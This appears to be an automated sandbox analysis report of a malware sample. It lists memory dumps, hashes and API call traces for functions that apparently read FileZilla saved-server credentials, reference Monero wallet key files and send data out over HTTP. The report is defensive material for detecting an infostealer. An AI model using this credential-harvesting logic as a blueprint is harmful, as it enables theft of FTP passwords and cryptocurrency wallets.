                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ece74c8b81d5e913fb10d122691e3cf2e4e49e74316610ddc34eca2ac116f078
                  • Instruction ID: 7811ffd390e6926a5286016c20116d7ad293bc3dc757dafb58f178ae40c37db8
                  • Opcode Fuzzy Hash: ece74c8b81d5e913fb10d122691e3cf2e4e49e74316610ddc34eca2ac116f078
                  • Instruction Fuzzy Hash: DA5126F3E192105BF3105969ECC87ABB796DBD4360F2B8638DE98E73C1E9395C054281
                  Function 00BD7A7D Relevance: .1, Instructions: 84COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8a9bf67a5b722ceb4fc2ed290f171a394c8017b847da0c78ce29d1f24b162f38
                  • Instruction ID: 41597ce388f9969bb07c0dc8f08b99aa1c4efdde2aeb74d2b312a8a9c51b00aa
                  • Opcode Fuzzy Hash: 8a9bf67a5b722ceb4fc2ed290f171a394c8017b847da0c78ce29d1f24b162f38
                  • Instruction Fuzzy Hash: D421D6F294831C5FE3247EA8EC8576AF794EB50310F1A053CDB9407780FA75294046DA
                  Function 00CC28FF Relevance: .1, Instructions: 80COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0589e8a8e2921bfe1d97609ade21c38d66aacd1f26aac9e480b40687caf206ef
                  • Instruction ID: 1d0cbbd056094e032c53097e1db17ddbada6b7c9e3370a2e4d0208f1c523172c
                  • Opcode Fuzzy Hash: 0589e8a8e2921bfe1d97609ade21c38d66aacd1f26aac9e480b40687caf206ef
                  • Instruction Fuzzy Hash: 3D2122B650C300EFE305AF69D882A6AFBE5FF98350F02492DE6D583250E732A4508A57
                  Function 00889750 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  Function 00880250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 00888DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00888E0B
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008799EC
                    • Part of subcall function 008799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00879A11
                    • Part of subcall function 008799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00879A31
                    • Part of subcall function 008799C0: ReadFile.KERNEL32(000000FF,?,00000000,0087148F,00000000), ref: 00879A5A
                    • Part of subcall function 008799C0: LocalFree.KERNEL32(0087148F), ref: 00879A90
                    • Part of subcall function 008799C0: CloseHandle.KERNEL32(000000FF), ref: 00879A9A
                    • Part of subcall function 00888E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00888E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,00890DBA,00890DB7,00890DB6,00890DB3), ref: 00880362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00880369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00880385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 00880393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 008803CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 008803DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00880419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 00880427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00880463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 00880475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 00880502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 0088051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 00880532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 0088054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00880562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00880571
                  • lstrcat.KERNEL32(?,url: ), ref: 00880580
                  • lstrcat.KERNEL32(?,00000000), ref: 00880593
                  • lstrcat.KERNEL32(?,00891678), ref: 008805A2
                  • lstrcat.KERNEL32(?,00000000), ref: 008805B5
                  • lstrcat.KERNEL32(?,0089167C), ref: 008805C4
                  • lstrcat.KERNEL32(?,login: ), ref: 008805D3
                  • lstrcat.KERNEL32(?,00000000), ref: 008805E6
                  • lstrcat.KERNEL32(?,00891688), ref: 008805F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00880604
                  • lstrcat.KERNEL32(?,00000000), ref: 00880617
                  • lstrcat.KERNEL32(?,00891698), ref: 00880626
                  • lstrcat.KERNEL32(?,0089169C), ref: 00880635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00890DB2), ref: 0088068E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: 4537f5b3aecc2315c6138eaaddbb6ffba4869ada2731ab80dc6d810e03f90c1f
                  • Instruction ID: 62037d7ea8b6aa823d413bcfeb62ff03f1820240c5da781902b93c8e39a2528e
                  • Opcode Fuzzy Hash: 4537f5b3aecc2315c6138eaaddbb6ffba4869ada2731ab80dc6d810e03f90c1f
                  • Instruction Fuzzy Hash: 9ED11F71900108ABDB08FBE4DD96DEE7778FF64700F544519F112E61D2EE38AA46CB62
                  Function 00875960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0088A7E6
                    • Part of subcall function 008747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00874839
                    • Part of subcall function 008747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00874849
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008759F8
                  • StrCmpCA.SHLWAPI(?,015DE4A0), ref: 00875A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00875B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015DE4B0,00000000,?,015D9DF8,00000000,?,00891A1C), ref: 00875E71
                  • lstrlen.KERNEL32(00000000), ref: 00875E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00875E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00875E9A
                  • lstrlen.KERNEL32(00000000), ref: 00875EAF
                  • lstrlen.KERNEL32(00000000), ref: 00875ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00875EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00875F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00875F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00875F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00875FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00875FBD
                  • HttpOpenRequestA.WININET(00000000,015DE530,?,015DDD58,00000000,00000000,00400100,00000000), ref: 00875BF8
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • InternetCloseHandle.WININET(00000000), ref: 00875FC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: c54458814efeb05aa91d5ed71067c2cd3615bf2ec0593e75c988b7cc31470120
                  • Instruction ID: fe5a5eda0064ff71e8c4253f8901d101c94ef57281de93612a4f5ee31a9deaba
                  • Opcode Fuzzy Hash: c54458814efeb05aa91d5ed71067c2cd3615bf2ec0593e75c988b7cc31470120
                  • Instruction Fuzzy Hash: DB12EE71820118AAEB19FBA4DC95FDEB378FF14700F5041AAF116A21D1DF746A4ACB62
                  Function 0087CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 00888B60: GetSystemTime.KERNEL32(00890E1A,015D9C18,008905AE,?,?,008713F9,?,0000001A,00890E1A,00000000,?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 00888B86
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0087CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0087D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0087D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D208
                  • lstrcat.KERNEL32(?,00891478), ref: 0087D217
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D22A
                  • lstrcat.KERNEL32(?,0089147C), ref: 0087D239
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D24C
                  • lstrcat.KERNEL32(?,00891480), ref: 0087D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D26E
                  • lstrcat.KERNEL32(?,00891484), ref: 0087D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D290
                  • lstrcat.KERNEL32(?,00891488), ref: 0087D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D2B2
                  • lstrcat.KERNEL32(?,0089148C), ref: 0087D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 0087D2D4
                  • lstrcat.KERNEL32(?,00891490), ref: 0087D2E3
                    • Part of subcall function 0088A820: lstrlen.KERNEL32(00874F05,?,?,00874F05,00890DDE), ref: 0088A82B
                    • Part of subcall function 0088A820: lstrcpy.KERNEL32(00890DDE,00000000), ref: 0088A885
                  • lstrlen.KERNEL32(?), ref: 0087D32A
                  • lstrlen.KERNEL32(?), ref: 0087D339
                    • Part of subcall function 0088AA70: StrCmpCA.SHLWAPI(015D8850,0087A7A7,?,0087A7A7,015D8850), ref: 0088AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 0087D3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: f713b0207810c6c1df0b3e27803a4106a987905a61d6524155abbc9d2b3088ef
                  • Instruction ID: 48f418648bcca27aab5b1303159e109f937995cb83223f120de33f2413eb1bbf
                  • Opcode Fuzzy Hash: f713b0207810c6c1df0b3e27803a4106a987905a61d6524155abbc9d2b3088ef
                  • Instruction Fuzzy Hash: 4CE1DA71910108ABDB08FBA4DD96EEE7778FF14301F104169F506E61E2DE39AA06DB63
                  Function 0087C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015DCF70,00000000,?,0089144C,00000000,?,?), ref: 0087CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0087CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0087CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0087CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0087CAD9
                  • StrStrA.SHLWAPI(?,015DCF88,00890B52), ref: 0087CAF7
                  • StrStrA.SHLWAPI(00000000,015DCE20), ref: 0087CB1E
                  • StrStrA.SHLWAPI(?,015DD318,00000000,?,00891458,00000000,?,00000000,00000000,?,015D8830,00000000,?,00891454,00000000,?), ref: 0087CCA2
                  • StrStrA.SHLWAPI(00000000,015DD138), ref: 0087CCB9
                    • Part of subcall function 0087C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0087C871
                    • Part of subcall function 0087C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0087C87C
                  • StrStrA.SHLWAPI(?,015DD138,00000000,?,0089145C,00000000,?,00000000,015D8890), ref: 0087CD5A
                  • StrStrA.SHLWAPI(00000000,015D8B00), ref: 0087CD71
                    • Part of subcall function 0087C820: lstrcat.KERNEL32(?,00890B46), ref: 0087C943
                    • Part of subcall function 0087C820: lstrcat.KERNEL32(?,00890B47), ref: 0087C957
                    • Part of subcall function 0087C820: lstrcat.KERNEL32(?,00890B4E), ref: 0087C978
                  • lstrlen.KERNEL32(00000000), ref: 0087CE44
                  • CloseHandle.KERNEL32(00000000), ref: 0087CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmpDownload File
